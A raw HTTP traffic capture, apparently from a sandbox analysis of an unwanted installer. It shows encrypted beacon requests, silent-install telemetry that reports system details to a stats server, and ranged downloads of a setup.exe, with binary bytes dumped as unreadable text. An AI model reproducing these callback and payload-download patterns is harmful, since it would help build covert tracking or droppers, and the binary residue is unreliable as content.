X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRoauGBKhpkBj 1FnN G3tSlj0Dx2m 0F47aFzcNuM2tbw FqU0ZF4YO51d/yz32tmquaHkbuQuAqpFpXrulLecGSS4ZuIyp4CyK1/ 6fzDi2txNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsl KqrDcjAVy4So4N0DyvUWoeJcRwVvwmQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRocgRgxetMCtyAhwsRGINruhH49K9bqCBjptTvQuQU86CVO2qWyDxTHBfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXbb13Y2YnIfy7hSJo6lb56S85UUKFh/e0 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19V1Gg4F6dkBzXUfBgwh1qVrevysBL0IwHwhEolvsKoHiSTZUc6Aooj3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:42 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=lOCrbsNL2zX5PxLbQh95wAXvthyJPaJKd67ZOkkzliGAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyX4qqsNyMBXLhKjg3QPK9RUYoPmCilwQzpEygzZ5HCHBgq eNMUDOF8WMvpiqiAuLauY01Zje2rnEEASnTAt8o5accpdDgHJP0JQd5HxgIXdwgIjv 1CV6Nl6iMSCUoXjJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:43 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=M7A8vgjJHrjHEQ/kk/2L9gXvthyJPaJKd67ZOkkzliGAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyX4qqsNyMBXLhKjg3QPK9RUYoPmCilwQzpEygzZ5HCHBgq eNMUDOF8WMvpiqiAuLauY01Zje2rmdskpjA9 6EJZxK5xGkdrnFAL52sIXt4VzrzFC04 gV5lncX3mCzqcRV2NtvBCcfJW0Hx6tEFQQ1 Ueo5mw0 RJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:43 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=1ZEnpGuz/IS8qFEAMB5m azLlpTYamnBnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wYZf1LqK7dF9Tc/ TiC/QQMa8vvz4viJlsTo2d4WqtMZ333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3TwZ3PcSIlH9s8cAK9 rs6AU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0af0yXUJZszOoYYgkqvVqk8ONfXU6zlpVVoxJbslHKtItQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:43 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=M7A8vgjJHrgnU0zGYqnF7YCqKDcj8uMnImHa5 zuJP9XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWhje9aYYjnGxmKZKBq4UF14SxlAMHHLmWrzkSKXLrpfjUu2F7cTkckXysGpf6P3fSEGTHC6fNrU58xq68k2LWb/g8qOxlG0IsLhsrgWaAFgzk2HxL2Lh3QfpBRneI3nfw8hUJxFglofBqp9Xc7DttahTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWjEluyUcq0i1 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:43 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=XOxRKBm2zlzeGR5RbVJEg7c6SIxRQRtBOtXSl8 CxaEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwn i/Vk2zUNtgKkdlz1lRoQ919p7AKUpMEwAaRG2pHiUVqC1aQjPYhDVQk8gY3vhjwXZuQM0I7 mdLIaqTW0yuBrd23Bi/YO5kgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqKL8oDrVP/cKI4034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndJfGZqutksGaga0 hrkPWI5ycXb3QZj8eUqO7k4PalFc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:44 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=043Mckb8LnjKYf/qJ5z9H8crIdqQqjphJvDvNLatV5w2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3SXxmarrZLBmoGtPoa5D1iOcnF290GY/Hng fWZsLDRwOWufSVBCsQTuVqOEbeDQPHiyoaNv5jwY8qJaeUqNPyfb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO7/Xczm4cWZTlVtB8erRBUEOQ1CMJ8nIJWySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYoLT3btyMareEuHRVOmbexINxVO2bJPMGfK5w9Mw84Eg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:44 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:44 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /21405.ashx?e=Bla1gpvbWwC3OkiMUUEbQYFyqRAyBI /KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOdM9SOPQahx7OjWRQ CK UV2cPl4nWMjqk/IV6ft2BimRteg227sOdLuf/scH7gncHIYVT16AkTDYCpHZc9ZUaH6/88N5jCoINCUHeR8YCF3OpZwd6ociX9 pobIk I43 1TuyEplpVVFm9k/ZfmpP0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU450z1I49BqHHs6NZFD4Ir5Rd/7ktAaGkOJ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:46 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /21405.ashx?e=60i6h5i9K u3OkiMUUEbQUXgQFBQBSWQKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOdM9SOPQahx7OjWRQ CK UV2cPl4nWMjqk/IV6ft2BimRteg227sOdLuf/scH7gncBgCRXRXrO/vWLazpewXw1hfOKWYd4uGNAB/MXM5vy8Es IILilpWF2wIdGQ/NYOW0D nsk guUXHw6Q2sZFYuNpgfdnT8YzzbQRS4Bw0lOuX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:48 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21405.ashx?e=XOxRKBm2zlz43cdm0TeNYoCqKDcj8uMnbZVhyzd0GYdXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWhje9aYYjnGxmKZKBq4UF14SxlAMHHLmWrzkSKXLrpfjIk52CBQfyUaa2dF0VKZsa4Q2/MQzLTqMBPEhRyyBD7AXvRHph9pI1Q0RNdvV2KXXSoNS7oinwYA0i/dYu8MdriDIreD3JgP/y0n5cCJyqErE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyX4qqsNyMBXLhKjg3QPK9Rah4lxHBW/CZ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: p2sds6-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:16:48 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Fri, 19 Jun 2015 06:16:48 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_66&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1434694627&procruntime=5&rnd=1434694632 HTTP/1.1

Host: stats.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: PQsbFZ2eVY4qEFZ/pMTtMbRVdg3Eoq5bfM1VANhipWNMAx/q4T2oHHpm7OwDd75 kDXlLin1KD0=

x-amz-request-id: A0E3DB65850F3BEC

Date: Fri, 19 Jun 2015 06:17:07 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:28:28 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: PQsbFZ
2eVY4qEFZ/pMTtMbRVdg3Eoq5bfM1VANhipWNMAx/q4T2oHHpm7OwDd75 kDXlLin1KD0=
..x-amz-request-id: A0E3DB65850F3BEC..Date: Fri, 19 Jun 2015 06:17:07 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:28:28 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_66&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639 HTTP/1.1

Host: stats.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: hDOqZ8lsT9ugFnoOgoBV7q8lPlKtNTKDHpAkKDgH0FP3SZuI QFVYDrpXt6k3S6 637xLB6QCkw=

x-amz-request-id: 351A88089100F1F9

Date: Fri, 19 Jun 2015 06:17:13 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:28:28 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=AE816059066843AA87631C5123001412PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1434694627&lifetime=0&silent=1&crtnm=na&procstarttime=1434694627&procruntime=12&rnd=1434694639 HTTP/1.1

Host: stats.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Q cmG4 LoT0KJgLBhIbnFrDYXPaBrI4HXl6oN22YTTyOoA89Kbu4EnE0sVJg5fmcJeoQ/MXTIk0=

x-amz-request-id: 67BC3380BD934040

Date: Fri, 19 Jun 2015 06:17:13 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:28:24 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:38 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=769

Content-Length: 250000

Content-Range: bytes 0-249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694598.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@..........................`
......./........ ..............................p..........0C..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:38 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=769

Content-Length: 250000

Content-Range: bytes 250000-499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694598.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
.....c.}R$R.<.r......$BX...s.8.<.-..v.g..v..K.Y\"....O...x.:.f.]
.:~`O...5.iZ>Lz...X.\c.G....<Q....}&0OO.L..u....>.d..QZ[aMz.f
.2t.M.D.\..`.?.hbd.....R....u...rT...........w...^*.. ..........k.-Nm6
..o..5..%U...J..".mtS.....cl....[n.....^.U|..4......1l.~Z*....D..:.I.T
._...{@HB.....21..t..{...lK....2.p.......?.......A...$.xdn...Gq.."V...
..hx...-....:.......`[k..H...q?..)..<.z.\.?y6.....u....ip.N....!...
..k..eY.K............O(.E..3.:.).....GM...#...f4Mrn..L..C."'...1/@.N.6
...uS.jD..).....N.\.F1...I7...V..0........~....F.....\M..Tg.1...b.{d/.
.B.H..'..Z..@%..q.x.HK....*>..9t.p./...plC...egwIR.W..s.gB.kd1..*..
......nL....M19...Q..?.....a0A....k...Z^....9...J..QL.Uo.!......=... b
..*......(Ic.......CH.^.R6 K @..$..,..>..`......G.C ...'..!..sgici.
....GB;`....d..w.0Y...^.....@.........,.....TL.p.n_..._?.q3 ....&<B
...u..|.R.Szx...M..w|P;..?.V.w...!w..^.z.:.._.......(F.L...-...g.,._..
u ...I8...*.~.V*b7....lf5{....~....\....\...'...1).O.Z...a...V....WzY:
,..ft.R1M.>E..).7.V</!'.....VyH.~6./...........uC.7V...i..o[$..u
.p.H.M.i....R3U...~1.3y>|._..8..i... ...!....Z.F.H..1$.J.K,p.. oc..
W.0)C.... ..j{[email protected]`.....O9.|.......$@.!Z.C.Gg.t.I%S.,9........
...b.T...0..i.'.....Gyc..f..i......o.....[^J....z..d...!..K.....<..
J/....t. ..;....H3A .. .....5..M.MWiVm..L.c....[K...Uc...Z.%1....j....
..)*Sh......hI . 0..jP<.N.?.<2.v&..<..C..!.......>o..pR .#
 .-........W6....]U..E.r{..Y..8x0.W.{.q....[.......g.. M.x..!.Pz.o..3.
C....`._..p<s...M....>1..R.>.I".....s."...?....j$U.z.BD&l<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive



.].{..6......VR....v.?.<..o=N|7....T....eC{..Ye\d. %...u:.`.f.DT...
V..3F!..m...QZG,.......Gm..\...C...l.:[E.n..K..m.'.9.....l..?F..).D<
;....r....B..].%...T."E:.Y......J|{.fEh9>C..xd.i/....e...qZ....7.D.
G [email protected].~...4....i.....c..4..2R.*....f......WxW.8.......H..
B.._p"...,.=..@;....L.^...iS....z0.U..I..ND..`F......A...#8.B....qM\j.
.4_e..b....2....M"R..o..z.C(...~~.....r.|/....D.A....V.......B........
..._....z..d..Y..Y.P.......{....[.R<..3.o...i..o.. c12...5..v2`.x[.
s......U...`.......E.TobF..,d..?..,..a....o.......2..d..O.\$.....7....
.\..`\..._..\_4...l.........^.$......M..H....7z.,M..Z...,.e@..(.4.x...
.*[email protected]/!.....:.,[email protected]:..<........0F.?..R.3.
.|.v1....|.!....4..o$.....[R.t...j=Z. ..ME1.......I..fT...[Q..h..>[
.i.e.Q.U..G.z..K...........GK..[.......-..6..C.C.._..|..v._...jO.,.}..
..............N.}.s.RH...l....F.8x......Z..k..?.,...~.....j\..i.y...)M
j/:AS h.Q...'r.....t.Y.is.W.=ebsQ....8....34....3.s~..H........W...T.7
....p.eg9j..Lm`...L.yT.E.gZ1...p..R!i.7..O|..'s.H.Q..O|.......rI.D....
....F.I..1..|..*[email protected] `}.....w............>^.2._zd5:V..o..*..@..
X.|D...........>.}%...f.9.....z.<.s.Yg.I..a.4x`{#..."I...J...O..
..|=......"q.2J..-..V........'.... ......k. .._....BZ...mV...t. .D.g.D
y.....H^...]..".90k5..".@.:t..E[...1K..(..]..,O'!h...&].4..1>......
..i~.rVt...~a........R../)...p...0........X....|.:..H..3.$.-;_.; .(...
4.....>.>...Iz.W@ .n.W...~..7...J..nS.c5..............|6..^.G...
.....yZ.....0....vLb.6Bk*.......,.k...kR.4....p...V..-EF.N<P.&.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=768

Content-Length: 250000

Content-Range: bytes 1250000-1499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop018.am4.t,1434694599.cds055.am4.c

Content-Disposition: attachment; filename="setup.exe"
....J.. ....ir..\...=...:.O_,...K..tXQwS.........\..".]..Q..3......q..
......vA..uCE...J...x..".}L'9..G.......D.b ....-5..6.w...TU..u_.(..sW.
...Mu.F.....e<Vq. n.<.`...y.&........US....>.....S.;..... .r.
<.SX..\VPA.{...E.Z..sQ9...V.o.8..$.&Z...vB.P...C..p.......<.....
[email protected]...[..e..........=.....x...).....o.b\s..
..u..e;....*7,.y....8x.Y.a.K.l&..7..I}.S.......8ic..`.X......G.}b..?..
6..z.]...M.....<..E..[...H1.....x.RF.n\...... ..`..:8,.$E.<7Y;sI
..#.W.%.W.>...\(.z....VPMw....?..x.N..._....^hQ>.})..."B..1...x.
^.&..?=:.W'.P~.....!:QD6pd..}k.R..R...|.{....`E..F..*M......5......3VA
;.j.}.'....u{.@.....;s...47........1]..]..Z."....^...<........0=HB1
.i....@.........#^....\?....;.m...."...h.(..&..>.i.t~....Z.F.E%sX..
p4...k..E...Z:|...#..Y..l.mx.F.{D..6y.mQv..>.4sk..>p.Tw......C..
...>.p..1.....!k.B.J..$'.v:..H.N)..5.C;..-~K./d..S...B....SP..U .).
g/..........C2<.).`EG....Z.....i..}p....p.....S.N.J5zR.......!q-...
..;....n9...d..<U......J.deE..C%..........&h.o%p..1..jp..../OD....D
N..e.......k0...._ ....L....7~.E....B.t.>x..f._...$jL..d..^Y.:..Z..
